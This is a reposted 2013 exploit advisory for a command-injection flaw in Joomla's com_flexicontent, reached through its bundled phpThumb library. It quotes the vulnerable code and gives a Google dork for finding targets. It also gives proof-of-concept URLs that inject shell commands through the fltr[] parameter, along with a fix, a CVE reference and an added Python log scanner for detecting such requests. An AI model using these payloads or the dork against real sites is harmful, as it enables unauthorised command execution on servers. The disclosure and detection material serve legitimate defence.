AndrewHaxalot

Joomla Flexicontent Remote Code Execution

Dec 9th, 2013
# Exploit Title: Joomla com_flexicontent Remote Code Execution
# Release Date: 08/12/2013
# Author: Deepankar Arora And Rafay Baloch
# Contact: http://rafayhackingarticles.net
# Vendor: http://www.flexicontent.org/
# Versions Affected: 2.1.3(Latest) and earlier
# Google Dork: inurl:com_flexicontent

*----*
*Description:*

This is a known vulnerability in phpthumb; however, the vulnerable library
has been included with the com_flexicontent package.

The exploit is nested in the "SafeExec" function, but the vulnerable
parameter is passed to "ImageMagickThumbnailToGD".

The vulnerable code is as follows:

foreach ($this->fltr as $filterkey => $filtercommand) {
    // Each fltr[] value is split once on '|': filter name, then its arguments
    @list($command, $parameter) = explode('|', $filtercommand, 2);
    switch ($command) {
        case 'blur':
            if ($this->ImageMagickSwitchAvailable('blur')) {
                @list($radius) = explode('|', $parameter);
                $radius = ($radius ? $radius : 1);
                // $radius is appended to the command line as-is
                $commandline .= ' -blur '.$radius;
                unset($this->fltr[$filterkey]);
            }
            break;

// ... (code omitted in the original excerpt)

$this->DebugMessage('ImageMagick called as ('.$commandline.')', __FILE__, __LINE__);
$IMresult = phpthumb_functions::SafeExec($commandline);
clearstatcache();
if (@$IMtempSourceFilename && file_exists($IMtempSourceFilename)) {
    @unlink($IMtempSourceFilename);
}

if (!@file_exists($IMtempfilename) || !@filesize($IMtempfilename)) {
    $this->FatalError('ImageMagick failed with message ('.trim($IMresult).')');
    $this->DebugMessage('ImageMagick failed with message ('.trim($IMresult).')', __FILE__, __LINE__);


Here the vulnerable parameter is fltr[]: the value passed is exploded on
the pipe (|) character, and that's where the code is passed.
How the command is processed:

$output = array();
$lastline = $execfunction($command, $output);
$returnvalue = implode("\n", $output);


As we can see, the $command parameter is compiled from the ImageMagick path,
the filename and the parameters. The phpThumbDebug parameter even gives us a
console-like account of everything ImageMagick does as it executes.


*----*
*POC:*

Windows-
/components/com_flexicontent/librairies/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9
-quality  75 -interlace line fail.jpg jpeg:fail.jpg %26%26 dir  %26%26
&phpThumbDebug=9

*nix-
/components/com_flexicontent/librairies/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9
-quality  75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l ;
&phpThumbDebug=9

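To review web server logs for requests of the shape shown in the POC, the following Python sketch (an added example, not part of the original advisory or of phpThumb) decodes each fltr[] value, splits it on the pipe as the vulnerable code does, and flags any field outside a simple allow-list. The log format, the allow-list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Assumption: access log lines in the common/combined format.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
FLTR_KEY = re.compile(r"fltr(\[\d*\])?")
# Assumption: legitimate filter fields are plain tokens (names, numbers, hex colours).
SAFE_FIELD = re.compile(r"[A-Za-z0-9_.#-]*")


def suspicious_fltr(request_target):
    """Return decoded fltr values that contain a field outside the allow-list."""
    query = request_target.partition("?")[2]
    hits = []
    for key, value in parse_qsl(query, keep_blank_values=True):
        if not FLTR_KEY.fullmatch(key):
            continue
        # Fields are pipe-separated: the filter name, then its arguments.
        if not all(SAFE_FIELD.fullmatch(field) for field in value.split("|")):
            hits.append(value)
    return hits


def scan_log(lines):
    """Return (line number, flagged fltr values) for phpThumb.php requests."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match or "phpthumb.php" not in match.group(1).lower():
            continue
        flagged = suspicious_fltr(match.group(1))
        if flagged:
            findings.append((number, flagged))
    return findings


# Constructed sample log (documentation IP ranges). Lines 2 and 3 are the two
# POC requests from this page as they would appear percent-encoded in a log.
BASE = "/components/com_flexicontent/librairies/phpthumb/phpThumb.php?src=file.jpg"
ARGS = "blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg"
SAMPLE_LOG = [
    f'192.0.2.10 - - [09/Dec/2013:10:00:01 +0000] "GET {BASE}&fltr[]=blur%7C9 HTTP/1.1" 200 5120',
    f'198.51.100.7 - - [09/Dec/2013:10:02:13 +0000] "GET {BASE}&fltr[]={ARGS}%20%3B%20ls%20-l%20%3B&phpThumbDebug=9 HTTP/1.1" 200 812',
    f'198.51.100.7 - - [09/Dec/2013:10:02:40 +0000] "GET {BASE}&fltr[]={ARGS}%20%26%26%20dir%20%26%26&phpThumbDebug=9 HTTP/1.1" 200 812',
    '203.0.113.5 - - [09/Dec/2013:10:03:00 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for number, flagged in scan_log(SAMPLE_LOG):
        print(f"line {number}: {flagged}")
```

The allow-list is deliberately strict; widen it only for filters a site actually uses.
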
*----*
*Fix:*

Replace the phpthumb package being used with the latest version.

*----*
*References:*
http://www.cvedetails.com/cve/CVE-2010-1598/

*----*
Warm Regards,
Deepankar Arora and Rafay Baloch
RHA Infosec